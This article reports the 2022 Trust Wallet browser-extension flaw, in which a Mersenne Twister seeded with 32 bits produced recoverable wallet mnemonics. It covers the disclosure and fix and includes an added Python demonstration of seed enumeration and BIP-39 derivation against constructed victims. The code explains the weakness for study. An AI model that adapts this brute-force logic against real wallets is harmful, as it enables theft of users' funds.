Trust Wallet made a significant announcement on November 14th, 2022, releasing its browser extension for general use.
The browser extension gives users direct access to digital assets on multiple blockchains, a long-awaited complement to the existing iOS and Android apps in Trust Wallet’s ecosystem.
However, security analysts at Ledger Donjon recently found a major vulnerability in this browser extension. The flaw allows funds to be stolen from any wallet created with the extension, and no user interaction is needed.
Vulnerability Overview
Trust Wallet is built on Trust Wallet Core, a cross-platform library for blockchain wallets that has also targeted WebAssembly (Wasm) since April 2022.
Trust Wallet Core is mostly portable, but some modules are target-specific, notably secure random generation for cryptographic material like:-
Private keys
HD wallet mnemonics
Each native target uses the operating system’s secure random number generator:-
For iOS, SecRandomCopyBytes is used.
For Android, the entropy is provided by an instance of java.security.SecureRandom.
The Wasm target has no such primitive, because there is no common system interface for secure randomness across browsers and Node.js environments.
The critical vulnerability arises because the Wasm build of wallet-core used the Mersenne Twister PRNG (mt19937), which is not suitable for cryptographic use, and seeded it with a single 32-bit value.
A 32-bit seed means only 2^32 (roughly 4.3 billion) mnemonics are possible, and all of them can be generated on a single computer within a couple of hours.
This gives an attacker the ability to:-
Compute all the seeds
Compute all the private keys
Compute all the addresses of every cryptocurrency
Scan the related blockchains
Extract all the used addresses
Compute the intersection
Identify the addresses that belong to wallets created by the Wasm build of Trust Wallet, then drain their funds.
The extension is closed source, but its code is easy to analyze: it relies on the vulnerable Wasm build of Trust Wallet Core to create the 12-word mnemonic from 128 bits of entropy during wallet creation.
Assets Handled
The auto-generated Wasm wrapper HDWallet.create calls the vulnerable random_buffer, so the mnemonic can be recovered by brute force. The extension handles various assets, including:-
AVAX
BNB
ETH
MATIC
SOL
TWT
Turning a PRNG seed into an address requires the following steps:-
Entropy generation
Entropy to mnemonic
Mnemonic to seed
Seed to BIP-32 master key
Master key to Ethereum private key
Ethereum private key to address
The derivation follows these standards:-
BIP-32
BIP-39
BIP-44
An address verification tool written as a Python script can quickly test 32 million addresses against the set produced by the vulnerable extension; computing the private keys for a dataset of 1,873,720 entries took only 4 min 22 s.
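The derivation chain and the brute-force scan described above, as an added example; this is not code from Trust Wallet, wallet-core or Ledger Donjon, and Python is used because the scanning tool mentioned is a Python script. It models the weak random_buffer with a faithful MT19937 seeded by one 32-bit value, carries the bytes through the BIP-39 checksum and 11-bit word split, then walks a slice of the seed space and intersects the derived wallets with a constructed set of victims, the way the real attack intersects computed addresses with on-chain ones. Assumptions: the low byte of each mt19937 output is taken as an entropy byte (the page does not state the exact extraction, and any fixed mapping leaves the same 2^32 keyspace); the names weak_entropy, strong_entropy, fingerprint, find_seeds and demo are mine; and the BIP-39 word list is not embedded, so the example stops at word indices instead of continuing to the Ethereum address.

```python
import hashlib
import secrets
from typing import Dict, List, Set, Tuple

# --- Faithful MT19937 (init_genrand + genrand_int32 of the reference implementation) ---
N, M = 624, 397
MATRIX_A, UPPER_MASK, LOWER_MASK = 0x9908B0DF, 0x80000000, 0x7FFFFFFF


class MT19937:
    """Mersenne Twister seeded with a single 32-bit integer, like std::mt19937(seed)."""

    def __init__(self, seed: int) -> None:
        self.mt = [0] * N
        self.mt[0] = seed & 0xFFFFFFFF
        for i in range(1, N):
            prev = self.mt[i - 1]
            self.mt[i] = (1812433253 * (prev ^ (prev >> 30)) + i) & 0xFFFFFFFF
        self.index = N  # force a twist before the first output

    def _twist(self) -> None:
        mt = self.mt
        for i in range(N):
            y = (mt[i] & UPPER_MASK) | (mt[(i + 1) % N] & LOWER_MASK)
            mt[i] = mt[(i + M) % N] ^ (y >> 1) ^ (MATRIX_A if y & 1 else 0)
        self.index = 0

    def next_u32(self) -> int:
        if self.index >= N:
            self._twist()
        y = self.mt[self.index]
        self.index += 1
        y ^= y >> 11
        y ^= (y << 7) & 0x9D2C5680
        y ^= (y << 15) & 0xEFC60000
        y ^= y >> 18
        return y & 0xFFFFFFFF


def weak_entropy(seed: int, nbytes: int = 16) -> bytes:
    """Model of the flawed random_buffer: nbytes of 'entropy' from mt19937 seeded with one 32-bit value.
    ASSUMPTION: the low byte of each 32-bit output is used (the exact extraction is not on the page)."""
    rng = MT19937(seed)
    return bytes(rng.next_u32() & 0xFF for _ in range(nbytes))


def strong_entropy(nbytes: int = 16) -> bytes:
    """What wallet creation needs instead: bytes from the OS CSPRNG, not reproducible from any seed."""
    return secrets.token_bytes(nbytes)


def bip39_word_indices(entropy: bytes) -> List[int]:
    """BIP-39 entropy -> word indices: append the first ENT/32 bits of SHA-256(entropy) as a checksum,
    then split into 11-bit groups (12 groups for 128-bit entropy). Mapping an index to a word needs
    the standard 2048-word English list, which is not embedded here."""
    ent_bits = len(entropy) * 8
    cs_bits = ent_bits // 32
    checksum = hashlib.sha256(entropy).digest()[0] >> (8 - cs_bits)
    bits = (int.from_bytes(entropy, "big") << cs_bits) | checksum
    total = ent_bits + cs_bits
    return [(bits >> (total - 11 * (i + 1))) & 0x7FF for i in range(total // 11)]


Fingerprint = Tuple[int, ...]


def fingerprint(seed: int) -> Fingerprint:
    """Deterministic identifier of the wallet a given seed produces. In the real attack this is the
    on-chain address reached via BIP-39 seed -> BIP-32 master key -> BIP-44 path; the word-index tuple
    stands in for it here because every later step is public and deterministic."""
    return tuple(bip39_word_indices(weak_entropy(seed)))


def find_seeds(targets: Set[Fingerprint], seed_range: range) -> Dict[Fingerprint, int]:
    """Enumerate candidate seeds and intersect their fingerprints with the target set: the
    'compute all seeds, scan, intersect' attack, generalised to many targets in one pass."""
    hits: Dict[Fingerprint, int] = {}
    for seed in seed_range:
        fp = fingerprint(seed)
        if fp in targets:
            hits[fp] = seed
    return hits


def demo() -> Dict[Fingerprint, int]:
    """Constructed scenario: two 'victim' wallets whose seeds (42 and 1337) the attacker never sees.
    Only a bounded slice of the 2^32 space is searched so the demo finishes in seconds."""
    victims = {fingerprint(42), fingerprint(1337)}
    return find_seeds(victims, range(0, 2000))


if __name__ == "__main__":
    for fp, seed in demo().items():
        print(f"seed {seed} -> word indices {list(fp)}")
```

The MT19937 class matches the reference generator (seed 5489 yields 3499211612 as its first output), so the enumeration is exactly the one an attacker performs; this pure-Python loop is much slower than the couple of hours quoted above for the full space, which is a figure for optimised native code, but the search is trivially parallel. The fix is the strong_entropy path: output from an OS-backed CSPRNG cannot be regenerated from any seed, which is the property the iOS and Android builds already had.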
Detection and Remediation
On November 17, 2022, the vulnerability was reported to Binance.
On November 21, the Trust Wallet team published a fix on GitHub.
Despite the disclosure and the patch, about $100k remains at risk in vulnerable wallets, and Trust Wallet has promised to reimburse funds stolen through this flaw.
This vulnerability is the worst kind of cryptocurrency bug: a weak mnemonic cannot be patched, so affected accounts are compromised for good and their funds must be moved to a wallet created with proper randomness. By contrast, Ledger devices draw their randomness from certified smartcard chips backed by some 40 years of tamper-resistance engineering.